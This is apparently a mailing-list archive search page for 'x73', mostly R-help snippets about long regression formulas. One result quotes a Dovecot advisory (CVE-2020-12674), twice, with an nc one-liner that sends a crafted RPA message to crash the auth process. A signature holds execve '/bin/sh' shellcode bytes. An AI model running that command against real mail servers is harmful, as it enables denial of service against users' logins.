search for: x73

Displaying 20 results from an estimated 33 matches for "x73".

Did you mean: 173
2011 Aug 20
2
a Question regarding glm for linear regression
...x23 + x24 + x25 + x26 + x27 + x28 + x29 + x30 + x31 + x32 + x33 + x34 + x35 + x36 + x37 + x38 + x39 + x40 + x41 + x42 + x43 + x44 + x45 + x46 + x47 + x48 + x49 + x50 + x51 + x52 + x53 + x54 + x55 + x56 + x57 + x58 + x59 + x60 + x61 + x62 + x63 + x64 + x65 + x66 + x67 + x68 + x69 + x70 + x71 + x72 + x73 + x74 + x75 + x76 + x77 + x78 + x79 + x80) it gives me an error "Error in eval(expr, envir, enclos) : object 'x3' not found" which I dont know why I am given those errors. The other thing is that when I use the "glm.fit", I can get coefficients without any errors. So, I...
2020 Aug 12
0
CVE-2020-12674: Specially crafted RPA authentication message crashes auth
...mechanism implementation accepts zero-length message, which leads to assert-crash later on Risk: An adversary can use this vulnerability to crash dovecot auth process repeatedly, preventing login. Steps to reproduce: (echo 'AUTH RPA'; echo -ne '\x60\x11\x06\x09\x60\x86\x48\x01\x86\xf8\x73\x01\x01\x01\x00\x04\x00\x00\x01' | base64 -w 0; echo ; echo -ne '\x60\x11\x06\x09\x60\x86\x48\x01\x86\xf8\x73\x01\x01\x00\x03A at A\x00' | base64 -w 0; echo ; echo QUIT) | nc 127.0.0.1 110 Workaround: Disable RPA authentication. Solution: Upgrade to fixed version. Best regards, Aki T...
2020 Aug 12
0
CVE-2020-12674: Specially crafted RPA authentication message crashes auth
...mechanism implementation accepts zero-length message, which leads to assert-crash later on Risk: An adversary can use this vulnerability to crash dovecot auth process repeatedly, preventing login. Steps to reproduce: (echo 'AUTH RPA'; echo -ne '\x60\x11\x06\x09\x60\x86\x48\x01\x86\xf8\x73\x01\x01\x01\x00\x04\x00\x00\x01' | base64 -w 0; echo ; echo -ne '\x60\x11\x06\x09\x60\x86\x48\x01\x86\xf8\x73\x01\x01\x00\x03A at A\x00' | base64 -w 0; echo ; echo QUIT) | nc 127.0.0.1 110 Workaround: Disable RPA authentication. Solution: Upgrade to fixed version. Best regards, Aki T...
2005 Jul 15
1
OT: cisco voip vulnerability
Thought those that use cisco in conjunction with asterisk may want to read this. I dont use cisco so I havent read it to see if its actually anything new. Vulnerabilities in Cisco's VOIP system http://www.computerworld.com/securitytopics/security/story/0,10801,103240,00.html?source=x73 -- Trixter http://www.0xdecafbad.com Bret McDanel UK +44 870 340 4605 Germany +49 801 777 555 3402 US +1 360 207 0479 or +1 516 687 5200 FreeWorldDialup: 635378 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature...
2018 Mar 14
2
truncation/rounding bug with write.csv
...quot;,"X55","X56","X57","X58","X59","X60","X61","X62","X63","X64","X65","X66","X67","X68","X69","X70","X71","X72","X73","X74","X75","X76","X77","X78","X79","X80","X81","X82","X83","X84","X85","X86","X87","X88","X89","X90","X91",&quot...
2004 May 11
1
calling data frames
...cbind(X29,X30,X31,X32,X33,X34,X35,X36,X37,X78) Guilda5<-cbind(X3,X8,X18,X23,X63,X82,X83) Guilda6<-cbind(X6,X38,X39,X44,X45,X46,X47,X49,X50,X51,X52,X53,X54,X55,X56,X57,X58,X59,X60,X61,X62,X84) Guilda7<-cbind(X1,X2,X42,X43,X64,X65,X66,X67,X68,X79,X80) Guilda8<-cbind(X7,X15,X16,X70,X71,X72,X73,X74,X75,X76) Guilda9<-cbind(X4,X9,X10,X11,X12,X13,X14,X81) Resul.Guilda1<-sum(apply(Guilda1,2,sum)) Resul.Guilda2<-sum(apply(Guilda2,2,sum)) Resul.Guilda3<-sum(apply(Guilda3,2,sum)) Resul.Guilda4<-sum(apply(Guilda4,2,sum)) Resul.Guilda5<-sum(apply(Guilda5,2,sum)) Resul.Guilda6<...
2017 Jul 31
0
[PATCH v11 03/10] daemon: utils: New functions unix_canonical_path, utf16le_to_utf8 and tests.
...; = "/"); + assert (unix_canonical_path "///usr//local//" = "/usr/local"); + assert (unix_canonical_path "/usr///" = "/usr") + +(* Test utf16le_to_utf8. *) +let () = + assert (utf16le_to_utf8 "\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00" = "Windows"); + assert (utf16le_to_utf8 "\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\xae\x00" = "Windows\xc2\xae") diff --git a/daemon/utils.ml b/daemon/utils.ml index b459a2314..b94515b71 100644 --- a/daemon/utils.ml +++ b/daemon/utils.ml @@ -2...
2018 Mar 14
2
truncation/rounding bug with write.csv
...X55","X56","X57","X58","X59","X60","X61" > ,"X62","X63","X64","X65","X66","X67","X68","X69","X70","X71" > ,"X72","X73","X74","X75","X76","X77","X78","X79","X80","X81" > ,"X82","X83","X84","X85","X86","X87","X88","X89","X90","X91"...
2010 May 11
1
Help with Names
..."X56" "X57" "X58" "X59" "X60" [61] "X61" "X62" "X63" "X64" "X65" "X66" "X67" "X68" "X69" "X70" "X71" "X72" "X73" "X74" "X75" "X76" "X77" "X78" "X79" "X80" [81] "X81" "X82" "X83" "X84" "X85" "X86" "X87" "X88" "X89" "X90"...
2018 Mar 14
2
truncation/rounding bug with write.csv
Hello, I have looked on https://www.r-project.org/bugs.html , but it seems that this is the only way to do it. The issue is that the precision used by write.csv is on consistant for big files. See the following code: First I create a large dataframe filled with random uniform values. Then I write it to .csv and print out the first and last lines. df = data.frame(replicate(100, runif(1000000,
2013 Apr 12
2
model frame and formula mismatch in model.matrix()
...icals. model <- lm(X2 +X3+X4+X5+X6+X7+X8+X9+X10+X11+X12+X13+X14+X15+X16+X17+X18+X19+X20+X21+X22+X23+X24+X25+X26+X27+X28+X29+X30+X31+X32+X33+X34+X35+X36+X37+X38+X39+X40+X41+X42+X43+X44+X45+X46+X47+X48+X49+X50+X51+X52+X53+X54+X55+X56+X57+X58+X59+X60+X61+X62+X63+X64+X65+X66+X67+X68+X69+X70+X71+X72+X73+X74+X75+X76+X77+X78+X79+X80+X81+X82+X83+X84+X85+X86+X87+X88+X89+X90+X91+X92+X93+X94+X95+X96+X97+X98+X99+X100+X101+X102+X103+X104+X105+X106+X107+X108+X109+X110+X111+X112+X113+X114+X115+X116+X117+X118+X119+X120+X121+X122+X123+X124+X125+X126+X127+X128+X129+X130+X131+X132+X133+X134+X135+X136+X137+X138+...
2018 Mar 14
0
truncation/rounding bug with write.csv
...quot;,"X55","X56","X57","X58","X59","X60","X61","X62","X63","X64","X65","X66","X67","X68","X69","X70","X71","X72","X73","X74","X75","X76","X77","X78","X79","X80","X81","X82","X83","X84","X85","X86","X87","X88","X89","X90","X91",&quot...
2009 Jun 24
2
change the height or scale of the y axis
...x55","x56","x57","x58","x59","x60", "x61","x62","x63","x64","x65","x66","x67","x68","x69","x70", "x71","x72","x73","x74","x75","x76","x77","x78","x79","x80", "x81","x82","x83","x84","x85","x86","x87","x88","x89","x90", "x91...
2012 May 25
2
Query about creating time sequences
...ot;, "X56", "X57", "X58", "X59", "X60", "X61", "X62", "X63", "X64", "X65", "X66", "X67", "X68", "X69", "X70", "X71", "X72", "X73", "X74", "X75", "X76", "X77", "X78", "X79", "X80", "X81", "X82", "X83", "X84", "X85", "X86", "X87", "X88", "X89", "X90", &qu...
2018 Mar 14
0
truncation/rounding bug with write.csv
...quot;,"X55","X56","X57","X58","X59","X60","X61","X62","X63","X64","X65","X66","X67","X68","X69","X70","X71","X72","X73","X74","X75","X76","X77","X78","X79","X80","X81","X82","X83","X84","X85","X86","X87","X88","X89","X90","X91",&quot...
2002 Jul 02
0
pam and openssh
...ock RedHat 7.3 GNU/Linux install and openssh is configured like this: ./configure --with-privsep-user=nobody --with-tcp-wrappers --with-pam --with-md5-passwords --with-ipv4-default ------------------------------------------------------------------------------- \x83\xec\x0c\x31\xc0\x31\xd2\x68\x2f\x73\x68\x21\x68\x2f\x62\x69\x6e\x89\xe3 \x88\x43\x07\x50\x50\x53\x53\xb0\x3b\xcd\x80\x89\xf6 Don't forget FreeBSD! -------------------------------------------------------------------------------
2013 Dec 15
9
btrfs balance on single device
...lable Use% Mounted on /dev/sda2 20971520 15362816 3960288 80% / /dev/sda3 22020096 10256168 11375416 48% /home Thanks, Leonidas -- Caution: breathing may be hazardous to your health. #include <stdio.h> int main(){printf("%s","\x4c\x65\x6f\x6e\x69\x64\x61\x73");} -- To unsubscribe from this list: send the line "unsubscribe linux-btrfs" in the body of a message to majordomo@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
2010 Mar 09
0
error with adaboost: replacement has 186 rows, data has 62
...X12 "CT" "AG" "CT" X54 "CT" "AG" "CC" X61 "CT" "AA" "CC" X68 "CT" "AG" "CC" X69 "CT" "AG" "TT" X73 "TT" "AA" "CC" X74 "TT" "GG" "CT" [1] "xtest" rs2289472 rs1551398 rs7927894 5 "TT" "AA" "TT" 20 "CT" "AG" "CC" 23 &quo...
2009 Aug 24
0
R survival package error message - bug?!
...X14, X15, X16, X17, X18, X19, X20, X21, X22, X23, X24, X25, X26, X27, X28, X29, X30, X31, X32, X33, X34, X35, X36, X37, X38, X39, X40, X41, X42, X43, X44, X45, X46, X47, X48, X49, X50, X51, X52, X53, X54, X55, X56, X57, X58, X59, X60, X61, X62, X63, X64, X65, X66, X67, X68, X69, X70, X71, X72, X73, X74, X75, X76, X77, X78, X79, X80, X81, X82, X83, X84, X85, X86, X87, X88, X89, X90, X91, X92, X93, X94, X95, X96, X97, X98, X99, X100, theta = lambda, scale = FALSE) and get the error message Error in model.frame.default(formula = form, data = sdf) : invalid variable names Calls: coxph ->...
2013 Apr 05
1
Accessing examplars in apcluster (apcluster package)
Hi, I was wondering how it was possible to access the actual cluster exemplars from the APResult class. Currently it only spits it out onto the terminal if you type the object but there is no other way to see which one is the examplar. Would appreciate any help. Thanks, Sachin [[alternative HTML version deleted]]